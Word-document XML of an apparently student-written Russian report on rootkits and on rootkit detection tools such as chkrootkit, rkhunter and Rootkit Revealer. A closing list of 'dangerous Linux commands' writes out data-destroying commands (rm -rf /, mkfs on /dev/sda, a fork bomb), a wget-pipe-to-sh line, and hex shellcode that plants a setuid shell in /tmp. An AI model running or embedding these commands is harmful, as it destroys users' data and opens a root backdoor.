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05" w:rsidRPr="00EB34FE" w:rsidRDefault="009562E9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB34FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Анализ устройства текущих программ и утилит, в которых организован поиск руткитов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00691656" w:rsidRPr="00691656" w:rsidRDefault="00691656" w:rsidP="0069165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Руткит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</w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tooltip="Английский язык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англ.</w:t>
        </w:r>
      </w:hyperlink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i/>
          <w:iCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>rootkit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то есть «набор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9" w:tooltip="Root (суперпользователь)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root</w:t>
        </w:r>
      </w:hyperlink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'а») — набор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0" w:tooltip="Компьютерная программа" w:history="1">
        <w:r w:rsidRPr="00EB34FE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программных средств</w:t>
        </w:r>
      </w:hyperlink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(например, исполняемых файлов, скриптов, конфигурационных файлов), для обеспечения:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00691656" w:rsidRPr="00691656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маскировки объектов (процессов, файлов, директорий, драйверов)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00691656" w:rsidRPr="00691656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контроля (событий, происходящих в системе)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00691656" w:rsidRPr="00EB34FE" w:rsidRDefault="00691656" w:rsidP="00691656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691656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сбора данных (параметров системы)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00555D29" w:rsidRPr="00EB34FE" w:rsidRDefault="00555D29" w:rsidP="00555D29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Установка руткитов могут быть автоматизированы или злоумышленник может установить его, как только он получит  пользовательский доступ от администратора системы ( доступ рута). Получение этого доступа является результатом прямого нападения на систему (т.е. эксплуатируя известную уязвимость, пароль (либо «трещин», привилегий или социальной инженерии)). После установки, становится возможным скрыть вторжение а также поддерживать привилегированный доступ. Хакер может обойти разные защиты узнав какую то уязвимость системы, различных утилит, портов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00691656" w:rsidRPr="00EB34FE" w:rsidRDefault="00FC3CD0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Источник: </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00691656" w:rsidRPr="00EB34F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https://ru.wikipedia.org/wiki/%D0%A0%D1%83%D1%82%D0%BA%D0%B8%D1%82</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003950D8" w:rsidRPr="00EB34FE" w:rsidRDefault="00691656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Основой антивирусного ПО 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является сканирующий движок( сканер) , представленный как правило в виде файла библиотеки (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dll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), т.</w:t>
      </w:r>
      <w:r w:rsidR="00E57DAA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="003950D8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 он может быть использован несколькими программами пакета.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003950D8" w:rsidRPr="00EB34FE" w:rsidRDefault="003950D8" w:rsidP="00691656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Сканируют обычно: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произвольные файлы, папки, диски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все загруженные в память процессы и их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dll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-файлы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003950D8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загрузочные записи диска(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MRB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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00691656" w:rsidRPr="00EB34FE" w:rsidRDefault="003950D8" w:rsidP="003950D8">
      <w:pPr>
        <w:pStyle w:val="a5"/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систему – поиск следов зловреда. Проверяют системные папки (поиск определенных файлов), сканируют реестр (следы в автозагрузке и реестре)</w:t>
      </w:r>
      <w:r w:rsidR="00AA415D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Виды сканирования: сигнатурный и эвристический.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Сканирование на основе сигнатур(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hash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scan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): проверка сигнатур файлов со словарем </w:t>
      </w:r>
      <w:r w:rsidR="007E154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(обычно это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md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5-хэши на основе известного вируса). Файл считается зараженным, если его хеш обнаружен в базу сигнатур. </w:t>
      </w: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Сигнатурный метод позволяет выявить атаку без ложных срабатываний (в отличие от эвристического)</w:t>
      </w:r>
      <w:r w:rsidR="008D29B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но невозможно выявить новый вирусы, которые не занесены в базу, не выя</w:t>
      </w:r>
      <w:r w:rsidR="00066E33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вляет полиморфные и шифрующиеся вирусы, так</w:t>
      </w:r>
      <w:r w:rsidR="008D29B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же невысока скорость.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00873658" w:rsidRPr="00CD5F96" w:rsidRDefault="00873658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FC3CD0" w:rsidRPr="00CD5F96" w:rsidRDefault="00FC3CD0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73658" w:rsidRPr="00EB34FE" w:rsidRDefault="00873658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Эвристическое сканирование предполагает поиск вредоносного ПО на основе заранее известных характеристик(</w:t>
      </w:r>
      <w:r w:rsidR="00262507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вристик).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A76E47" w:rsidRPr="00EB34FE" w:rsidRDefault="0060235E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Как правило вирусы создают </w:t>
      </w:r>
      <w:r w:rsidR="007E154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определенные файлы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которые можно выявить. Для руткитов характерна загрузочная запись. Для этого можно считать </w:t>
      </w:r>
      <w:r w:rsidR="006972F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загрузочную запись двумя путями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: с помощью прямого доступа к диску и с помощью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api</w:t>
      </w:r>
      <w:r w:rsidR="006972F1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а затем сравнить результаты; если они будут различны, имеет место подмена системных функций </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A76E47" w:rsidRPr="00EB34FE" w:rsidRDefault="00A76E47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8D29B7" w:rsidRPr="00EB34FE" w:rsidRDefault="00FC3CD0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Также необходимы дополнительно список файлов, которые не наносят вреда системе и которым мы доверяем, но на них происходит срабатывание сканера(белый список) и распаковщики и дешифровщики, чтобы сканировать содержимое архивов и зашифрованных файлов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC3CD0" w:rsidRPr="00EB34FE" w:rsidRDefault="00FC3CD0" w:rsidP="00FC3CD0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Источник: </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00EB34FE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https://habrahabr.ru/post/145948/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00FC3CD0" w:rsidRPr="00EB34FE" w:rsidRDefault="00555D29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Распространенные программы и утилиты для поиска руткитов в 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Linux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555D29" w:rsidRPr="006F520C" w:rsidRDefault="00555D29" w:rsidP="006F520C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="336" w:lineRule="atLeast"/>
        <w:jc w:val="center"/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</w:pPr>
      <w:r w:rsidRPr="006F520C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="252525"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Инструмент chkrootkit (Check Rootkit).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00555D29" w:rsidRPr="00EB34FE" w:rsidRDefault="00D90B0B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 скрипт с помощью обычных инструментов UNIX / Linux (таких как strings и grep команд) дают возможность искать основные системные программы для сетей/ подписей сравнивая в файловой системе /proc  файлов с выводом команды ps (состояние процесса), чтобы искать разные расхождения.</w:t>
      </w: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Утилита имеет в себе модули для различного сканирования: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chkrootkit — Модуль который проверяет вашу ОС.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ifpromisc — Служит для поиска интерфейса (ов),  которые работают в режимах захвата пакетов.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chklastlog — Служит для обнаружения различных фактов удаления записей из журнального файла lastlog.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chkwtmp — Служит для обнаружения фактов удаления записей из журнального файла wtmp.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check_wtmpx — Служит для обнаружения фактов удаления записей из журнального файла (только в Solaris).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>chkproc — Ищет следы от троянов LKM (Linux Kernel Module — модуль ядра Linux.)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chkdirs — Ищет следы от троянов LKM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D90B0B" w:rsidRPr="00E85734" w:rsidRDefault="00D90B0B" w:rsidP="00E85734">
      <w:pPr>
        <w:pStyle w:val="a5"/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strings — Утилита для быстроты поиска и замены текстовых строк.</w:t>
      </w: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Что может эта утилита найти</w:t>
      </w:r>
      <w:r w:rsidR="00040D40"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(различное нежелательное ПО и руткиты)</w:t>
      </w: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D90B0B" w:rsidRDefault="00D90B0B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5438775"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="1" name="Рисунок 1" descr="Список что может найти chkroot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что может найти chkrootk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0C" w:rsidRPr="00EB34FE" w:rsidRDefault="006F520C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941A67" w:rsidRPr="00EB34FE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Утилита chkrootkit может использовать и другие утилиты для проверки, такие как awk, cut, egrep, find, head, id, ls, netstat, ps, strings, sed, uname. Если эти утилиты недоступны в пути поиска, то нужно указать путь к ним с помощью опции -p.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F520C" w:rsidRPr="00DF2329" w:rsidRDefault="00941A67" w:rsidP="00DF2329">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="center"/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</w:pPr>
      <w:r w:rsidRPr="006F520C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="252525"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Инструмент rkhunter (Rootkit Hunter).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00941A67" w:rsidRPr="00EB34FE" w:rsidRDefault="00941A67" w:rsidP="00F910A2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="252525"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB34FE">
        <w:rPr>
          <w:color w:val="252525"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>RkHunter (Rootkit Hunter) является Unix-инструментом, который сканирует вашу систему на наличие руткитов, бэкдоров и возможных локальных эксплойтов. Она делает это путем сравнения SHA-1 хэшей важных файлов с известными хорошими базами данных в онлайновом режиме, а так же поиск каталогов по умолчанию (руткитов),</w:t>
      </w:r>
      <w:r w:rsidR="006F520C">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006F520C" w:rsidRPr="006F520C">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>проводит проверку сетевых портов и интерфейсов, проводит проверку системного</w:t>
      </w:r>
      <w:r w:rsidR="006F520C" w:rsidRPr="006F520C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="006F520C" w:rsidRPr="006F520C">
        <w:rPr>
          <w:rStyle w:val="txb"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>boot</w:t>
      </w:r>
      <w:r w:rsidR="006F520C" w:rsidRPr="006F520C">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, проводит проверку групп и аккаунтов, проводит проверку системных конфигурационных файлов, проводит пр</w:t>
      </w:r>
      <w:r w:rsidR="00F910A2">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>оверку файловой системы в целом,</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB34FE">
        <w:rPr>
          <w:color w:val="252525"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> неправильных разрешений, скрытых файлов, подозрительных строк в модулей ядра для Linux и FreeBSD.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00941A67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Этот инструмент использует сигнатурный метод, т. к после установки конфигурации необходимо сделать «слепок» ОС(первоначальная база данных свойств различных команд), для того, чтобы было можно сравнивать текущее состояние системы с состоянием команд в этой БД.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E85734" w:rsidRPr="00EB34FE" w:rsidRDefault="00E85734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Вся проверка записывается в файл</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/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>
        <w:rPr>
          <w:rStyle w:val="txb"/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/var/log/rkhunter/rkhunter .log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00941A67" w:rsidRPr="00EB34FE" w:rsidRDefault="00941A67" w:rsidP="00941A67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B34FE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Сканирование выполняется в нескольких режимах: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Ищет уязвимости в командах;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Поиск rootkits;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Проверка network сети;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00941A67" w:rsidRPr="00E85734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Проверка локального хоста;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00941A67" w:rsidRDefault="00941A67" w:rsidP="00E8573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E85734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После чего нам покажут полную статистику.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0040515C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40515C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40515C" w:rsidRPr="00132513" w:rsidRDefault="0040515C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Существует такая интересная утилита, как</w:t>
      </w:r>
      <w:r w:rsidR="00132513"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hyperlink r:id="rId14" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00132513">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="4B5B6E"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>Rootkit Revealer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0013251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</w:t>
      </w:r>
      <w:r w:rsidRPr="00132513">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00132513">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="4B5B6E"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>Марка Руссиновича</w:t>
        </w:r>
      </w:hyperlink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 утверждению ее создателя, она обнаруживает все руткиты, представленные на</w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00132513">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="4B5B6E"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>www.rootkits.com</w:t>
        </w:r>
      </w:hyperlink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что не соответствует действительности — тривиальная проверка выявляет большое количество малвари, отслеживающей запуск Rootkit Revealer’а и модифицирующей его код в памяти таким</w:t>
      </w:r>
      <w:r w:rsidRPr="00132513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образом, чтобы он ничего не показывал. Естественно, подобная техника работает только со строго определенными версиями Rootkit Revealer’а</w:t>
      </w:r>
      <w:r w:rsidRPr="00132513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</w:p>
    <w:p w:rsidR="0040515C" w:rsidRDefault="0040515C" w:rsidP="0040515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 тому же Rootkit Revealer находит только те руткиты, которые: а) </w:t>
      </w:r>
      <w:r w:rsidRPr="00132513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модифицируют реестр и/или файловую систему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б) </w:t>
      </w:r>
      <w:r w:rsidRPr="00132513">
        <w:rPr>
          <w:rStyle w:val="a9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скрывают следы своего присутствия</w:t>
      </w:r>
      <w:r w:rsidRPr="0013251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Если хотя бы одно из этих условий не выполняется, руткит не будет обнаружен. Анализ кода некоторых руткитов показывает, что они отслеживают появление окна Rootkit Revealer’а и прекращают свою маскировку на время его работы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009831E9" w:rsidRDefault="009831E9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Источник: </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00DE6CDE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https://xakep.ru/2008/03/20/42886/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00CD5F96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Pr="00301EB0" w:rsidRDefault="00CD5F96" w:rsidP="0040515C">
      <w:pPr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</w:pP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 xml:space="preserve">Опасные команды </w:t>
      </w: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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00301EB0">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00301EB0" w:rsidRPr="00301EB0" w:rsidRDefault="00301EB0" w:rsidP="00301EB0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</w:pP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rm -rf / #with root privilege such as 'sudo'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00301EB0" w:rsidRPr="00301EB0" w:rsidRDefault="00301EB0" w:rsidP="00301EB0">
      <w:pPr>
        <w:pStyle w:val="a5"/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</w:pPr>
      <w:r w:rsidRPr="00301EB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>рекурсивное удаление всех файлов на пк и подключенных носителях</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00301EB0" w:rsidRPr="00301EB0" w:rsidRDefault="00301EB0" w:rsidP="00301EB0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FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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char esp[] __attribute__ ((section(".text"))) /* e.s.p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release */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= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"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"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"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"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"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"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"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"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"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"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"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"\x6e\x2f\x73\x68\x00\x2d\x63\x00"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"cp -p /bin/sh /tmp/.beyond; chmod 4755</w:t>
      </w:r>
      <w:r w:rsidRPr="00301EB0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00301EB0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/tmp/.beyond;";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00301EB0" w:rsidRDefault="00301EB0" w:rsidP="00301EB0">
      <w:pPr>
        <w:ind w:firstLine="36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Шестнадцатеричный код то же команды, что и в первом примере.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E6DD4" w:rsidRPr="001E6DD4" w:rsidRDefault="001E6DD4" w:rsidP="001E6DD4">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E6DD4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mkfs.ext3 /dev/sda</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E6DD4" w:rsidRDefault="001E6DD4" w:rsidP="001E6D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E6DD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Форматирование устройства /dev/sda с удалением всех файлов на нём.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A07AE" w:rsidRPr="007A07AE" w:rsidRDefault="007A07AE" w:rsidP="007A07AE">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="30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  4)</w:t>
      </w:r>
      <w:r w:rsidRPr="007A07AE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A07AE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>:(){:|:&amp;};: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Запуск слишком большого количества процессов приведёт к зависанию системы.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any_command &gt; /dev/sda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Запись потока данных на устройство /dev/sda, который заменит все файлы на нём.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7A07AE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>wget http://sumber_tak_terpercaya -O- | sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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Скачивает шелл-скрипт из ненадёжного источника и исполняет его после окончания скачивания.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A07AE" w:rsidRPr="007A07AE" w:rsidRDefault="007A07AE" w:rsidP="007A07AE">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="007A07AE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>mv /home/username/* /dev/null</w:t>
      </w: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7A07A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7A07AE" w:rsidRDefault="007A07AE" w:rsidP="007A07A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7A07AE" w:rsidRPr="001E6DD4" w:rsidRDefault="007A07AE" w:rsidP="001E6DD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1E6DD4" w:rsidRDefault="001E6DD4" w:rsidP="00301EB0">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001E6DD4" w:rsidRPr="00301EB0" w:rsidRDefault="001E6DD4" w:rsidP="00301EB0">
      <w:pPr>
        <w:ind w:firstLine="360"/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5F96" w:rsidRPr="00301EB0" w:rsidRDefault="00CD5F96" w:rsidP="00CD5F96">
      <w:pPr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Источник:  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https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://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xakep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CD5F9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ru</w:t>
      </w:r>
      <w:r w:rsidRPr="00301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/2012/04/03/58516/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009831E9" w:rsidRPr="00301EB0" w:rsidRDefault="009831E9" w:rsidP="0040515C">
      <w:pPr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941A67" w:rsidRPr="00EB34FE" w:rsidRDefault="00941A67" w:rsidP="00D90B0B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90B0B" w:rsidRPr="00EB34FE" w:rsidRDefault="00D90B0B" w:rsidP="00FC3CD0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AA415D" w:rsidRPr="00EB34FE" w:rsidRDefault="00AA415D" w:rsidP="00AA415D">
      <w:pPr>
        <w:pStyle w:val="a5"/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9562E9" w:rsidRPr="00EB34FE" w:rsidRDefault="009562E9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="009562E9" w:rsidRPr="00EB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5D6" w:rsidRDefault="00DC75D6" w:rsidP="006F520C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00DC75D6" w:rsidRDefault="00DC75D6" w:rsidP="006F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5D6" w:rsidRDefault="00DC75D6" w:rsidP="006F520C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00DC75D6" w:rsidRDefault="00DC75D6" w:rsidP="006F5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5549A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B9D2512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AF2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EB90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C0A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="66869AA8"/>
    <w:lvl w:ilvl="0" w:tplc="1FAA1BD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46D6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9246FB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F818C6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E6C19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E9"/>
    <w:rsid w:val="00040D40"/>
    <w:rsid w:val="00066E33"/>
    <w:rsid w:val="00132513"/>
    <w:rsid w:val="001E6DD4"/>
    <w:rsid w:val="00262507"/>
    <w:rsid w:val="00301EB0"/>
    <w:rsid w:val="003950D8"/>
    <w:rsid w:val="0040515C"/>
    <w:rsid w:val="00555D29"/>
    <w:rsid w:val="0060235E"/>
    <w:rsid w:val="00691656"/>
    <w:rsid w:val="006972F1"/>
    <w:rsid w:val="006D3332"/>
    <w:rsid w:val="006F520C"/>
    <w:rsid w:val="007A07AE"/>
    <w:rsid w:val="007E1541"/>
    <w:rsid w:val="00873658"/>
    <w:rsid w:val="008D29B7"/>
    <w:rsid w:val="00941A67"/>
    <w:rsid w:val="009562E9"/>
    <w:rsid w:val="00962D36"/>
    <w:rsid w:val="009830E2"/>
    <w:rsid w:val="009831E9"/>
    <w:rsid w:val="00A76E47"/>
    <w:rsid w:val="00AA415D"/>
    <w:rsid w:val="00AC340D"/>
    <w:rsid w:val="00B47D75"/>
    <w:rsid w:val="00C12C5A"/>
    <w:rsid w:val="00CD5F96"/>
    <w:rsid w:val="00D90B0B"/>
    <w:rsid w:val="00DC75D6"/>
    <w:rsid w:val="00DF2329"/>
    <w:rsid w:val="00DF2795"/>
    <w:rsid w:val="00E57DAA"/>
    <w:rsid w:val="00E85734"/>
    <w:rsid w:val="00EB34FE"/>
    <w:rsid w:val="00F910A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0C54"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F0D98754-53F4-4D6B-A5C6-5FEE354C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91656"/>
  </w:style>
  <w:style w:type="character" w:styleId="a4">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006916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50D8"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="txb">
    <w:name w:val="txb"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="006F520C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="endnote text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a7"/>
